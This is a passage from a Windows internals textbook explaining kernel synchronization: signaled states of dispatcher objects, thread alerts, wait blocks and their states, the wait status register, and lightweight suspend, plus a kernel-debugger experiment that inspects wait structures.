to the mechanism described earlier, the DPC is registered with the object, and when the wait is satis-
fied, the DPC is queued into the current processor's queue (as if the driver had just called
KeInsertQueueDpc). When the dispatcher lock is dropped and the IRQL returns below DISPATCH_
LEVEL, the DPC executes on the current processor, which is the driver-supplied callback that can now
react to the signal state of the object.
Irrespective of the waiting mechanism, the synchronization object(s) being waited on can be in one
of two states: signaled state or nonsignaled state. A thread can't resume its execution until the object
undergoes a state change, from the nonsignaled state to the signaled state (when another thread sets
an event object, for example).
To synchronize with an object, a thread calls one of the wait system services that the Object
Manager supplies, passing a handle to the object it wants to synchronize with. The thread can wait for
one or several objects and can also specify that its wait should be canceled if it hasn't ended within a
certain amount of time. Whenever the kernel sets an object to the signaled state, one of the kernel's
signal routines checks to see whether any threads are waiting for the object and not also waiting for
other objects to become signaled. If there are, the kernel releases one or more of the threads from their
waiting state so that they can continue executing.
To asynchronously wait on an object, a thread first creates an I/O completion
port, and then calls NtCreateWaitCompletionPacket to create a wait completion packet object and re-
ceive a handle back to it. Then, it calls NtAssociateWaitCompletionPacket, passing in both the handle to
the I/O completion port as well as the handle to the wait completion packet it just created, combined
with a handle to the target object. Whenever the object enters the
signaled state, the signal routines realize that no thread is currently waiting on the object, and instead
check whether an I/O completion port has been associated with the wait. If so, it signals the queue ob-
ject associated with the port, which causes any threads currently waiting on it to wake up and consume
the wait completion packet (or, alternatively, the queue simply becomes signaled until a thread comes
in and attempts to wait on it). Alternatively, if no I/O completion port has been associated with the wait,
then a check is made to see whether a DPC is associated instead, in which case it will be queued on the
current processor. This part handles the kernel-only DPC Wait Event mechanism described earlier.
The following example of setting an event illustrates how synchronization interacts with thread
dispatching:
I
A user-mode thread waits for an event object's handle.
I
The kernel changes the thread's scheduling state to waiting and then adds the thread to a list of
threads waiting for the event.
I
Another thread sets the event.
I
The kernel marches down the list of threads waiting for the event. If a thread's conditions for
waiting are satisfied, the kernel takes the thread out of the waiting state. If it is a variable-priority
thread, the kernel might also boost its execution priority. (For
details on thread scheduling, see Chapter 4 of Part 1.)
Note Some threads might be waiting for more than one object, so they continue waiting,
unless they specified a WaitAny wait, which will wake them up as soon as one object (instead
of all) is signaled.
What signals an object?
The signaled state is defined differently for different objects. A thread object is in the nonsignaled state
during its lifetime and is set to the signaled state by the kernel when the thread terminates. Similarly,
the kernel sets a process object to the signaled state when the process's last thread terminates. In con-
trast, the timer object, like an alarm, is set to “go off” at a certain time. When its time expires, the kernel
sets the timer object to the signaled state.
When choosing a synchronization mechanism, a programmer must take into account the rules
governing the behavior of different synchronization objects. Whether a thread's wait ends when an
object is set to the signaled state varies with the type of object the thread is waiting for, as Table 8-27
illustrates.
TABLE 8-27 Definitions of the signaled state

Object Type                   Set to Signaled State When                  Effect on Waiting Threads
Process                       Last thread terminates.                     All are released.
Thread                        Thread terminates.                          All are released.
Event (notification type)     Thread sets the event.                      All are released.
Event (synchronization type)  Thread sets the event.                      One thread is released and might receive a
                                                                          boost; the event object is reset.
Gate (locking type)           Thread signals the gate.                    First waiting thread is released and receives
                                                                          a boost.
Gate (signaling type)         Thread signals the gate.                    First waiting thread is released.
Keyed event                   Thread sets event with a key.               Thread that's waiting for the key and that
                                                                          is of the same process as the signaler is
                                                                          released.
Semaphore                     Semaphore count drops by 1.                 One thread is released.
Timer (notification type)     Set time arrives or time interval expires.  All are released.
Timer (synchronization type)  Set time arrives or time interval expires.  One thread is released.
Mutex                         Thread releases the mutex.                  One thread is released and takes ownership
                                                                          of the mutex.
Queue                         Item is placed on queue.                    One thread is released.
When an object is set to the signaled state, waiting threads are generally released from their wait
states immediately.
For example, a notification event object (called a manual reset event in the Windows API) is used to
announce the occurrence of some event. When the event object is set to the signaled state, all threads
waiting for the event are released. The exception is any thread that is waiting for more than one object
at a time; such a thread might be required to continue waiting until additional objects reach the sig-
naled state.
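Stripped of the threading details, the difference between the two event types comes down to what wait satisfaction does to the signaled state. A toy model in C (all names here are invented for illustration):

```c
#include <assert.h>
#include <stdbool.h>

typedef struct {
    bool signaled;
    bool manual_reset;  /* true: notification event; false: synchronization */
} toy_event_t;

static void toy_set_event(toy_event_t *e)
{
    e->signaled = true;
}

/* Models the wait-satisfaction rule: a satisfied wait on a synchronization
 * (auto-reset) event consumes the signal, so only one waiter gets through;
 * a notification (manual-reset) event stays signaled for every waiter. */
static bool toy_try_wait(toy_event_t *e)
{
    if (!e->signaled)
        return false;           /* the waiter would block */
    if (!e->manual_reset)
        e->signaled = false;    /* auto-reset: back to the nonsignaled state */
    return true;
}
```

This mirrors the rows for the two event types in Table 8-27: "all are released" versus "one thread is released and the event object is reset."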
In contrast to an event object, a mutex object has ownership associated with it (unless it was ac-
quired during a DPC). It is used to gain mutually exclusive access to a resource, and only one thread at
a time can hold the mutex. When the mutex object becomes free, the kernel sets it to the signaled state
and then selects one waiting thread to execute, while also inheriting any priority boost that had been
applied. (See Chapter 4 of Part 1 for more information on priority boosting.) The thread selected by the
kernel acquires the mutex object, and all other threads continue waiting.
A mutex object can also be abandoned, something that occurs when the thread currently owning
it becomes terminated. When a thread terminates, the kernel enumerates all mutexes owned by the
thread and sets them to the abandoned state, which, in terms of signaling logic, is treated as a signaled
state in that ownership of the mutex is transferred to a waiting thread.
For more information on how to put these objects to use in Windows programs, see the Windows reference
documentation on synchronization objects or the book Windows
via C/C++ from Microsoft Press.
Object-less waiting (thread alerts)
In some situations, a thread needs to wait for a specific condition to occur, and another thread
needs to signal the occurrence of the condition. Although this can be achieved by tying an event to
the condition, this requires resources (memory and handles, to name a couple), and acquisition and
creation of resources can fail while also taking time and being complex. The Windows kernel provides
two mechanisms for synchronization that are not tied to dispatcher objects:
two mechanisms for synchronization that are not tied to dispatcher objects:
I
Thread alerts
I
Thread alert by ID
With the first mechanism, a thread enters an alertable sleep by using SleepEx (ultimately
resulting in NtDelayExecutionThread). A kernel thread could also choose to use KeDelayExecutionThread.
We previously explained the concept of alertability earlier in the section on software interrupts and APCs.
In this case, the other side uses the NtAlertThread (or KeAlertThread) API to alert the thread, which causes the sleep to abort,
returning the status code STATUS_ALERTED. The
thread can also choose not to enter an alertable sleep state, but instead, at a later time of its choosing, call the
NtTestAlert (or KeTestAlertThread) API to check for a pending alert. Finally, a thread could avoid entering an alertable wait state
by suspending itself instead (NtSuspendThread or KeSuspendThread). In this case, the other side can use
NtAlertResumeThread to both alert the thread and then resume it.
Although this mechanism is elegant and simple, it does suffer from a few issues, beginning with the
fact that there is no way to identify whether the alert was the one related to the wait—in other words,
any other thread could've also alerted the waiting thread, which has no way of distinguishing between
the alerts. Second, because the alert APIs are not officially documented, while internal kernel and
user services can leverage this mechanism, third-party developers are not meant to use alerts. Third,
once a thread becomes alerted, any pending queued APCs also begin executing—such as user-mode
APCs, if the thread was in an alertable wait. And finally, NtAlertThread still requires opening a
handle to the target thread—an operation that technically counts as acquiring a resource, an operation
which can fail. Callers could theoretically open their handles ahead of time, guaranteeing that the alert
will succeed, but that still does add the cost of a handle in the whole mechanism.
To respond to these issues, the Windows kernel received a more modern mechanism start-
ing with Windows 8, which is the alert by ID. Although the system calls behind this mechanism—
NtAlertThreadByThreadId and NtWaitForAlertByThreadId—are not documented, the Win32 user-mode
wait API that we describe later is. These system calls are extremely simple and require zero resources,
using only the Thread ID as input. Of course, since there is no handle involved, this could be a security issue; therefore, the
one disadvantage to these APIs is that they can only be used to synchronize with threads within the
current process.
The behavior of the mechanism is simple: first, the blocking thread calls the
NtWaitForAlertByThreadId API, passing in an optional timeout. This makes the thread enter a real wait,
without alertability being a concern. In fact, in spite of the name, this type of wait is non-alertable, by
design. Next, the other thread calls the NtAlertThreadByThreadId API, which causes the kernel to look
up the Thread ID, make sure it belongs to the calling process, and then check whether the thread is in-
deed blocking on a call to NtWaitForAlertByThreadId. If it is, the thread is simply woken up.
This simple, elegant mechanism is the heart of a number of user-mode synchronization primitives later
in this chapter and can be used to implement anything from barriers to more complex synchronization
methods.
Data structures
Three data structures are key to tracking who is waiting, how they are waiting, what they are waiting for,
and which state the entire wait operation is at. These three structures are the dispatcher header, the wait
block, and the wait status register
KWAIT_
STATUS_REGISTER (and the FlagsKWAIT_STATE enumeration).
The dispatcher header
The dispatcher header is a packed structure that overlays many fields through the union construct
in programming theory. By using the Type field, the kernel knows which of these fields is relevant; for
example, a mutex can be Abandoned, but a timer can be Relative. Similarly, a timer can be Inserted
into the timer list, but debugging can only be Active for a process. Regardless of the object's type, the dispatcher header contains the
Signaled state and the Wait List Head for the wait blocks associated with the object.
These wait blocks represent the fact that a thread (or, in the case of asynchronous waiting, an I/O
completion port) is tied to an object. Each thread that is in a wait state has an array of up to 64 wait
blocks that represent the object(s) the thread is waiting for (including, potentially, a wait block point-
ing to the internal thread timer used to satisfy a timeout on the wait).
Alternatively, if the alert-by-ID primitives are used, there is a single block with a special indication that
this is not a dispatcher-based wait. The ObjectHint field contains the Thread ID that was passed to
NtWaitForAlertByThreadId. This array is maintained for two main purposes:
I
When a thread terminates, all objects that it was waiting on must be dereferenced, and the wait
blocks deleted and disconnected from the object(s).
I
When a thread is awakened by just one of the objects it is waiting on (thus satisfying
the wait), all the other objects it may have been waiting on must be dereferenced
and the wait blocks deleted and disconnected.
Just like each thread has this array of wait blocks, each dispatcher object also has a linked list of wait blocks tied to it. This list is kept so that when a dis-
patcher object is signaled, the kernel can quickly determine who is waiting on (or which I/O completion
port is tied to) that object and apply the wait satisfaction logic we explain shortly.
Additionally, because the balance set manager thread running on each CPU (see Chapter 5 of Part 1 for
more information about the balance set manager) needs to analyze the time that each thread has
been waiting for (to decide whether to page out the kernel stack), each PRCB has a list of eligible wait-
ing threads that last ran on that processor. This reuses the Ready List field of the KTHREAD structure
because a thread can't be both ready and waiting at the same time. Eligible threads must satisfy the
following three conditions:
I
The wait must have been issued with a wait mode of UserMode (KernelMode waits are assumed
to be time-sensitive and not worth the cost of stack swapping).
I
The thread must have the EnableStackSwap flag set (drivers can disable it with the
KeSetKernelStackSwapEnable API).
I
The thread's priority must be below the real-time priority range (24 is the
default for a normal thread in the “real-time” process priority class).
The wait block contains a pointer to the object being waited
on, but as we pointed out earlier, for an alert-by-ID wait, there is no object involved, so this represents
the Hint that was specified by the caller. Other than pointing to the thread
waiting on the object, a wait block can also point to the queue of an I/O completion port, in the case where a wait
completion packet was associated with the object as part of an asynchronous wait.
Each wait block also contains the wait type and the wait block state, and,
depending on the type, a wait key can also be present. The wait type is very important during wait
satisfaction, because it determines how the wait blocks are processed: for a
wait any, the kernel does not care about the state of any other object because at least one of them (the
current one!) is now signaled. On the other hand, for a wait all, the kernel can only wake the thread if
all the other objects are also in a signaled state at the same time, which requires iterating over the wait
blocks and their associated objects.
Alternatively, a wait dequeue is a specialized case for situations where the dispatcher object is
actually a queue (I/O completion port), and there is a thread waiting on it to have completion pack-
ets available (by calling KeRemoveQueue(Ex) or (Nt)IoRemoveIoCompletion). Wait blocks attached to
queues carry this wait type so that, when the queue is signaled, the correct actions can be taken (keep in mind that a thread could be waiting
on multiple objects, so it could have other wait blocks, in a wait any or wait all state, that must still be
handled regularly).
With a wait notification, the kernel knows that no thread is associated with the object at all and that
this is an asynchronous wait with an associated I/O completion port whose queue will be signaled.
(Because a queue is itself a dispatcher object, this causes a second order wait satisfaction for the queue
and any threads potentially waiting on it.)
186
CHAPTER 8 System mechanisms
Finally, the wait DPC, which is the newest wait type introduced, lets the kernel know that there is no
thread nor I/O completion port associated with this wait, but a DPC object instead. In this case, the
DPC is queued to the current processor for immediate execution once the dispatcher lock is dropped.
The wait block also contains a volatile wait block state (KWAIT_BLOCK_STATE) that defines the cur-
rent state of this wait block in the transactional wait operation it is currently engaged in. The different
states, their meaning, and their effects in the wait logic code are explained in Table 8-28.
TABLE 8-28 Wait block states

WaitBlockActive (4)
  Meaning: This wait block is actively linked to an object as part of a thread that is in a wait state.
  Effect: During wait satisfaction, this wait block will be unlinked from the wait block list.

WaitBlockInactive (5)
  Meaning: The thread wait associated with this wait block has been satisfied (or the timeout has
  already expired while setting it up).
  Effect: During wait satisfaction, this wait block will not be unlinked from the wait block list
  because the wait satisfaction must have already unlinked it during its active state.

WaitBlockSuspended (6)
  Meaning: The thread associated with this wait block is undergoing a lightweight suspend
  operation.
  Effect: Essentially treated the same as WaitBlockActive but only ever used when resuming a
  thread. Ignored during regular wait satisfaction (should never be seen there, because suspended
  threads are not waiting).

WaitBlockBypassStart (0)
  Meaning: A signal is being delivered to the thread while the wait has not yet been committed.
  Effect: During wait satisfaction (which would be immediate, before the thread enters the true
  wait state), the waiting thread must synchronize with the signaler because there is a risk that the
  wait object might be on the stack—marking the wait block as inactive would cause the waiter to
  unwind the stack while the signaler might still be accessing it.

WaitBlockBypassComplete (1)
  Meaning: The thread wait associated with this wait block has now been properly synchronized
  (the wait satisfaction has completed), and the bypass scenario is now completed.
  Effect: The wait block is now essentially treated the same as an inactive wait block (ignored).

WaitBlockSuspendBypassStart (2)
  Meaning: A signal is being delivered to the thread while the lightweight suspend has not yet
  been committed.
  Effect: The wait block is treated essentially the same as a WaitBlockBypassStart.

WaitBlockSuspendBypassComplete (3)
  Meaning: The lightweight suspend associated with this wait block has now been properly
  synchronized.
  Effect: The wait block now behaves like a WaitBlockSuspended.
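The numeric values shown in parentheses suggest an enumeration along these lines (a hypothetical rendering for illustration; the real definition lives in the kernel's headers):

```c
#include <assert.h>

/* Wait block states as listed in Table 8-28 (hypothetical rendering). */
typedef enum {
    WaitBlockBypassStart           = 0,
    WaitBlockBypassComplete        = 1,
    WaitBlockSuspendBypassStart    = 2,
    WaitBlockSuspendBypassComplete = 3,
    WaitBlockActive                = 4,
    WaitBlockInactive              = 5,
    WaitBlockSuspended             = 6,
} wait_block_state;

/* Per the table, only an active wait block is unlinked during wait
 * satisfaction; the other states are ignored or handled specially. */
static int unlinks_on_satisfaction(wait_block_state s) {
    return s == WaitBlockActive;
}
```

Note that WaitBlockActive is 4, which is why a debugger dump of a wait block belonging to a committed wait shows a BlockState of 0x4.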
With the removal of the global dispatcher lock in Windows 7, the overall state of the thread (or any
of the objects it is being required to start waiting on) can now change while the wait operation is still
being set up. Because there is no longer any global state synchronization, there is nothing to stop
another thread—executing on a different logical processor—from signaling one of the objects being
waited on, or alerting the thread, or even sending it an APC. As such, the kernel dispatcher keeps track
of a couple of additional data points for each waiting thread object: the current fine-grained wait state
of the thread (KWAIT_STATE, not to be confused with the wait block state) and any pending state
changes that could modify the result of an ongoing wait operation. These two pieces of data are what
make up the wait status register (KWAIT_STATUS_REGISTER).
When a thread is instructed to wait for a given object (such as due to a WaitForSingleObject call), it first
attempts to enter the in-progress wait state (WaitInProgress) by beginning the wait. This operation suc-
ceeds if there are no pending alerts to the thread at the moment (based on the alertability of the wait and
the current processor mode of the wait, which determine whether the alert can preempt the wait). If there
is an alert, the wait is not entered at all, and the caller receives the appropriate status code; otherwise, the
thread now enters the WaitInProgress state, at which point the main thread state is set to Waiting, and the
wait reason and wait time are recorded, with any timeout specified also being registered.
Once the wait is in progress, the thread can initialize the wait blocks as needed (and mark them
as WaitBlockActive in the process) and then proceed to lock all the objects that are part of this wait.
Because each object has its own lock, it is important that the kernel be able to maintain a consistent
locking ordering scheme when multiple processors might be analyzing a wait chain consisting of many
objects (caused by a WaitForMultipleObjects call). The kernel uses a technique known as address order-
ing to achieve this: because each object has a distinct and static kernel-mode address, the objects can
be ordered in monotonically increasing address order, guaranteeing that locks are always acquired
and released in the same order by all callers. This means that the caller-supplied array of objects will be
duplicated and sorted accordingly.
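The address-ordering step can be sketched as follows (hypothetical helper names; a sketch of the technique, not the kernel's implementation, which operates on its own wait-block arrays):

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Compare two object pointers by their numeric kernel-mode address. */
static int by_address(const void *a, const void *b) {
    uintptr_t pa = (uintptr_t)*(void *const *)a;
    uintptr_t pb = (uintptr_t)*(void *const *)b;
    if (pa < pb) return -1;
    return pa > pb;
}

/* Duplicate and sort a caller-supplied object array so that every caller
 * acquires the per-object locks in monotonically increasing address order,
 * which prevents lock-ordering deadlocks between concurrent waiters. */
static void **sort_objects_by_address(void **objects, size_t count) {
    void **sorted = malloc(count * sizeof(*sorted));
    if (!sorted) return NULL;
    for (size_t i = 0; i < count; i++) sorted[i] = objects[i];
    qsort(sorted, count, sizeof(*sorted), by_address);
    return sorted; /* caller locks sorted[0], sorted[1], ... in order */
}
```

Because every caller derives the same total order from the same static addresses, two processors analyzing overlapping wait chains can never acquire the same two locks in opposite orders.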
The next step is to check for immediate satisfaction of the wait, such as when a thread is being told to
wait on a mutex that has already been released or an event that is already signaled. In such cases, the wait
is immediately satisfied, unlinking the associated wait blocks (however, in this case, no wait blocks have
yet been inserted) and performing a wait exit (processing any pending scheduler operations marked in
the wait status register). If this shortcut fails, the kernel next attempts to check whether the timeout
specified for the wait (if any) has already expired. In this case, the wait is not "satisfied" but merely
"timed out," which results in slightly faster processing of the exit code, albeit with the same result.
If none of these shortcuts were effective, the thread now attempts to commit its wait. (Meanwhile, the object lock or locks have been released,
allowing other processors to modify the state of any of the objects that the thread is now supposed to
attempt waiting on.) Assuming a noncontended scenario, where other processors are not interested in
this thread or its wait objects, the wait switches into the committed state as long as there are no pend-
ing changes marked by the wait status register. The commit operation links the waiting thread in the
PRCB list, activates an extra wait queue thread if needed, and inserts the timer associated with the wait
timeout, if any. Because potentially quite a lot of cycles have elapsed by this point, it is again possible
that the timeout has already elapsed. In this scenario, inserting the timer causes immediate signaling of
the thread and thus a wait satisfaction on the timer and the overall timeout of the wait. Otherwise, in
the much more common scenario, the CPU now context-switches away to the next thread that is ready
for execution. (See Chapter 4 of Part 1 for more information on scheduling.)
In highly contended code paths on multiprocessor machines, it is possible and likely that the
thread attempting to commit its wait has experienced a change while its wait was still in progress. One
possible scenario is that one of the objects it was waiting on has just been signaled. As touched upon
earlier, this causes the associated wait block to enter the WaitBlockBypassStart state, and the thread's
wait status register now shows the WaitAborted wait state. Another possible scenario is for an alert or
APC to have been issued to the waiting thread, which does not set the WaitAborted state but enables
one of the corresponding bits in the wait status register. Because APCs can break waits (depending on
the type of APC, wait mode, and alertability), the APC is delivered, and the wait is aborted. Other op-
erations simply modify the wait status register, and the wait is then reprocessed or exited, as with the
previous cases mentioned.
More recent versions of Windows implemented a lightweight suspend mechanism for cases when
SuspendThread and ResumeThread are used, which no longer always queues an APC that then acquires
the suspend event embedded in the thread object. Instead, if the following conditions are true, an
existing wait is converted into a suspend state:
- KiDisableLightWeightSuspend is 0 (administrators can use the DisableLightWeightSuspend
  registry value to turn off this optimization).
- The thread state is Waiting—that is, the thread is already in a wait state.
- The wait status register is set to WaitCommitted—that is, the thread's wait has been fully
  engaged.
- The thread is not an UMS primary or scheduled thread (see Chapter 4 of Part 1 for more infor-
  mation on User Mode Scheduling) because these require additional logic implemented in the
  suspend APC.
- The thread issued a wait while at IRQL 0 (passive level) because waits at APC_LEVEL require
  special handling that only the suspend APC can provide.
- The thread does not have APCs currently disabled, nor is there an APC in progress, because
  these situations require additional synchronization that only the suspend APC can achieve.
- The thread is not currently attached to a different process due to a call to KeStackAttachProcess
  because this requires special handling just like the preceding bullet.
- If the thread has a wait block in the WaitBlockInactive state, its wait type must be WaitAll;
  otherwise, there must be at least one active WaitAny block.
As the preceding list of criteria is hinting, this conversion happens by taking any currently active wait
blocks and converting them to a WaitBlockSuspended state instead. If a wait block is currently point-
ing to an object, it is unlinked from the object's wait list (so that signaling the object will
no longer wake up this thread). If the thread had a timer associated with it, it is canceled and removed.
Because it no longer uses a true wait object, this mechanism required the introduction of the three
additional wait block states shown in Table 8-28 as well as four new wait states: WaitSuspendInProgress,
WaitSuspended, WaitResumeInProgress, and WaitResumeAborted. These new states behave in a similar
manner to their regular counterparts but address the possible race conditions described earlier
during a lightweight suspend operation.
When the thread is resumed, the kernel detects the lightweight suspend state and essentially
undoes the operation, setting the wait register to WaitResumeInProgress. Each wait block is then
enumerated, and any block in the WaitBlockSuspended state is placed back in the WaitBlockActive
state and linked back into the object's wait list, unless the object became signaled in the meantime, in
which case it is made WaitBlockInactive instead, just like in a regular wake operation.
Figure 8-39 shows the relationship of dispatcher objects to wait blocks to threads to the PRCB (it as-
sumes the threads are eligible for stack swapping). In this example, CPU 0 has two waiting (committed)
threads: Thread 1 is waiting for object B, and thread 2 is waiting for objects A and B. If object A is sig-
naled, the kernel sees that because thread 2 is also waiting on object B, it can't be readied
for execution. On the other hand, if object B is signaled, the kernel can ready thread 1 for execution
right away because it isn't waiting on any other objects. (Alternatively, if thread 1 was also waiting on
other objects but its wait type was a WaitAny, the kernel could still wake it up.)
[Figure: dispatcher objects A and B, each with object-type-specific data (Type, Size, State) and a wait
list head linking per-thread wait blocks (each holding Thread, Object, Next link, Key, and Type fields);
the thread objects with their own wait block lists; and the PRCB 0 wait list head linking the waiting
threads.]
FIGURE 8-39 Wait data structures.
EXPERIMENT: Looking at wait queues
You can see the list of objects a thread is waiting for with the kernel debugger's !thread command.
For example, the following snippet of !process command output shows that the
thread is waiting for an event object:
lkd> !process 0 4 explorer.exe
THREAD ffff898f2b345080 Cid 27bc.137c Teb: 00000000006ba000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff898f2b64ba60 SynchronizationEvent
You can use the dx command to interpret the dispatcher header of the object like this:
lkd> dx (nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60
(nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60: 0xffff898f2b64ba60 [Type: _DISPATCHER_HEADER*]
    [+0x000] Lock              : 393217 [Type: long]
    [+0x000] LockNV            : 393217 [Type: long]
    [+0x000] Type              : 0x1 [Type: unsigned char]
    [+0x001] Signalling        : 0x0 [Type: unsigned char]
    [+0x002] Size              : 0x6 [Type: unsigned char]
    [+0x003] Reserved1         : 0x0 [Type: unsigned char]
    [+0x000] TimerType         : 0x1 [Type: unsigned char]
    [+0x001] TimerControlFlags : 0x0 [Type: unsigned char]
    [+0x001 ( 0: 0)] Absolute  : 0x0 [Type: unsigned char]
    [+0x001 ( 1: 1)] Wake      : 0x0 [Type: unsigned char]
    [+0x001 ( 7: 2)] EncodedTolerableDelay : 0x0 [Type: unsigned char]
    [+0x002] Hand              : 0x6 [Type: unsigned char]
    [+0x003] TimerMiscFlags    : 0x0 [Type: unsigned char]
    [+0x003 ( 5: 0)] Index     : 0x0 [Type: unsigned char]
    [+0x003 ( 6: 6)] Inserted  : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 7)] Expired   : 0x0 [Type: unsigned char]
    [+0x000] Timer2Type        : 0x1 [Type: unsigned char]
    [+0x001] Timer2Flags       : 0x0 [Type: unsigned char]
    [+0x001 ( 0: 0)] Timer2Inserted : 0x0 [Type: unsigned char]
    [+0x001 ( 1: 1)] Timer2Expiring : 0x0 [Type: unsigned char]
    [+0x001 ( 2: 2)] Timer2CancelPending : 0x0 [Type: unsigned char]
    [+0x001 ( 3: 3)] Timer2SetPending : 0x0 [Type: unsigned char]
    [+0x001 ( 4: 4)] Timer2Running : 0x0 [Type: unsigned char]
    [+0x001 ( 5: 5)] Timer2Disabled : 0x0 [Type: unsigned char]
    [+0x001 ( 7: 6)] Timer2ReservedFlags : 0x0 [Type: unsigned char]
    [+0x002] Timer2ComponentId : 0x6 [Type: unsigned char]
    [+0x003] Timer2RelativeId  : 0x0 [Type: unsigned char]
    [+0x000] QueueType         : 0x1 [Type: unsigned char]
    [+0x001] QueueControlFlags : 0x0 [Type: unsigned char]
    [+0x001 ( 0: 0)] Abandoned : 0x0 [Type: unsigned char]
    [+0x001 ( 1: 1)] DisableIncrement : 0x0 [Type: unsigned char]
    [+0x001 ( 7: 2)] QueueReservedControlFlags : 0x0 [Type: unsigned char]
    [+0x002] QueueSize         : 0x6 [Type: unsigned char]
    [+0x003] QueueReserved     : 0x0 [Type: unsigned char]
    [+0x000] ThreadType        : 0x1 [Type: unsigned char]
    [+0x001] ThreadReserved    : 0x0 [Type: unsigned char]
    [+0x002] ThreadControlFlags : 0x6 [Type: unsigned char]
    [+0x002 ( 0: 0)] CycleProfiling : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] CounterProfiling : 0x1 [Type: unsigned char]
    [+0x002 ( 2: 2)] GroupScheduling : 0x1 [Type: unsigned char]
    [+0x002 ( 3: 3)] AffinitySet : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] Tagged    : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] EnergyProfiling : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SchedulerAssist : 0x0 [Type: unsigned char]
    [+0x002 ( 7: 7)] ThreadReservedControlFlags : 0x0 [Type: unsigned char]
    [+0x003] DebugActive       : 0x0 [Type: unsigned char]
    [+0x003 ( 0: 0)] ActiveDR7 : 0x0 [Type: unsigned char]
    [+0x003 ( 1: 1)] Instrumented : 0x0 [Type: unsigned char]
    [+0x003 ( 2: 2)] Minimal   : 0x0 [Type: unsigned char]
    [+0x003 ( 5: 3)] Reserved4 : 0x0 [Type: unsigned char]
    [+0x003 ( 6: 6)] UmsScheduled : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 7)] UmsPrimary : 0x0 [Type: unsigned char]
    [+0x000] MutantType        : 0x1 [Type: unsigned char]
    [+0x001] MutantSize        : 0x0 [Type: unsigned char]
    [+0x002] DpcActive         : 0x6 [Type: unsigned char]
    [+0x003] MutantReserved    : 0x0 [Type: unsigned char]
    [+0x004] SignalState       : 0 [Type: long]
    [+0x008] WaitListHead [Type: _LIST_ENTRY]
        [+0x000] Flink         : 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
        [+0x008] Blink         : 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
Because this structure is a union, you should ignore any values that do not correspond to the
given object type because they are not relevant to it. Unfortunately, it is not easy to tell which
fields apply to which object type; Table 8-29 summarizes the flags and the objects to which they apply.
TABLE 8-29 Dispatcher header flags

Type (All dispatcher objects)
  Identifies the type of dispatcher object that this is.

Lock (All objects)
  Used for locking an object during wait operations that need to modify its state or linkage;
  actually corresponds to bit 7 (0x80) of the Type field.

Signaling (Gates)
  A priority boost should be applied to the woken thread when the gate is signaled.

Size (Events, Semaphores, Gates, Processes)
  Size of the object, divided by 4, so that it fits in a single byte.

Timer2Type (Idle Resilient Timers)
  Mapping of the Type field.

Timer2Inserted (Idle Resilient Timers)
  Set if the timer was inserted into the timer handle table.

Timer2Expiring (Idle Resilient Timers)
  Set if the timer is undergoing expiration.

Timer2CancelPending (Idle Resilient Timers)
  Set if the timer is being canceled.

Timer2SetPending (Idle Resilient Timers)
  Set if the timer is being registered.

Timer2Running (Idle Resilient Timers)
  Set if the timer's callback is currently running.

Timer2Disabled (Idle Resilient Timers)
  Set if the timer has been disabled.
Timer2ComponentId (Idle Resilient Timers)
  Identifies the component associated with this timer.

Timer2RelativeId (Idle Resilient Timers)
  Identifies which of the component's timers this is.

TimerType (Timers)
  Mapping of the Type field.

Absolute (Timers)
  The expiration time is absolute, not relative.

Wake (Timers)
  This is a wakeable timer, meaning it should exit a standby state when signaled.

EncodedTolerableDelay (Timers)
  The maximum amount of tolerance (shifted as a power of two) that the timer can support when
  running outside of its expected periodicity.

Hand (Timers)
  Index into the timer handle table.

Index (Timers)
  Index into the timer expiration table.

Inserted (Timers)
  Set if the timer was inserted into the timer handle table.

Expired (Timers)
  Set if the timer has already expired.

ThreadType (Threads)
  Mapping of the Type field.

ThreadReserved (Threads)
  Unused.

CycleProfiling (Threads)
  CPU cycle profiling has been enabled for this thread.

CounterProfiling (Threads)
  Hardware CPU performance counter monitoring has been enabled for this thread.

GroupScheduling (Threads)
  Scheduling groups have been enabled for this thread, such as when CPU rate limits are used
  for throttling.

AffinitySet (Threads)
  The thread has a CPU Set associated with it.

Tagged (Threads)
  The thread has been assigned a property tag.

EnergyProfiling (Threads)
  Energy estimation is enabled for the process that this thread belongs to.

SchedulerAssist (Threads)
  The Hyper-V XTS (eXTended Scheduler) is enabled, and this thread belongs to a virtual
  processor (VP) thread inside of a VM minimal process.

Instrumented (Threads)
  Specifies whether the thread has a user-mode instrumentation callback.

ActiveDR7 (Threads)
  Hardware breakpoints are being used, so DR7 is active; this flag is also sometimes called
  DebugActive.

Minimal (Threads)
  This thread belongs to a minimal process.

AltSyscall (Threads)
  An alternate system call handler has been registered for the process that owns this thread,
  such as a Pico Provider or a Windows CE PAL.
UmsScheduled (Threads)
  This thread is a UMS Worker (scheduled) thread.

UmsPrimary (Threads)
  This thread is a UMS Scheduler (primary) thread.

MutantType (Mutants)
  Mapping of the Type field.

MutantSize (Mutants)
  Unused.

DpcActive (Mutants)
  The mutant was acquired during a DPC.

MutantReserved (Mutants)
  Unused.

QueueType (Queues)
  Mapping of the Type field.

Abandoned (Queues)
  The queue no longer has any threads that are waiting on it.

DisableIncrement (Queues)
  No priority boost should be given to a thread waking up to handle a packet on the queue.
Apart from these flags, the dispatcher header also contains the SignalState field and the
WaitListHead, both of which we described earlier. Keep in mind that when the wait list head
pointers are identical, this can either mean that there are no threads waiting or that one thread
is waiting on this object. You can tell the difference if the identical pointer happens to be the ad-
dress of the list head itself, which indicates that there are no waiters at all. Because that is not
the case here, we can dump the wait block the pointers reference:
lkd> dx (nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
(nt!_KWAIT_BLOCK*)0xffff898f2b3451c0 : 0xffff898f2b3451c0 [Type: _KWAIT_BLOCK *]
    [+0x000] WaitListEntry [Type: _LIST_ENTRY]
    [+0x010] WaitType          : 0x1 [Type: unsigned char]
    [+0x011] BlockState        : 0x4 [Type: unsigned char]
    [+0x012] WaitKey           : 0x0 [Type: unsigned short]
    [+0x014] SpareLong         : 6066 [Type: long]
